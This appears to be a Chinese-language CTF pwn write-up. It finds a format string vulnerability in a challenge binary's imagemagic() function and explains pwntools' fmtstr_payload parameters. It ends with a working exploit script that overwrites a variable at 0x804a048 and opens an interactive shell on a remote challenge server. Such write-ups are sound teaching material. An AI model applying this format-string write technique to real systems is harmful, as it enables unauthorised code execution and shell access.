将35795746换成十六进制0x2223322(按H)
根据函数,只需要令key等于0x2223322即可getshell
查看一下 imagemagic()函数
存在格式化字符串漏洞
具体看wiki:https://ctf-wiki.org/pwn/linux/user-mode/fmtstr/fmtstr-intro/
了解到一个骚操作
fmtstr_payload(offset, writes, numbwritten=0, write_size='byte')
第一个参数表示格式化字符串的偏移;
第二个参数表示需要利用%n写入的数据,采用字典形式,我们要将printf的GOT数据改为system函数地址,就写成{printfGOT: systemAddress};本题是将0804a048处改为0x2223322
第三个参数表示已经输出的字符个数,这里没有,为0,采用默认值即可;
第四个参数表示写入方式,是按字节(byte)、按双字节(short)还是按四字节(int),对应着hhn、hn和n,默认值是byte,即按hhn写。
fmtstr_payload函数返回的就是payload
写一下exp
#usr/bin/env python
# -*- coding:utf-8 -*-
from pwn import *
p = process("./9926c1a194794984978011fc619e3301")
p = remote('111.200.241.244',64340)
payload = fmtstr_payload(12,{0x804a048:0x02223322})
p.send(payload)
p.interactive()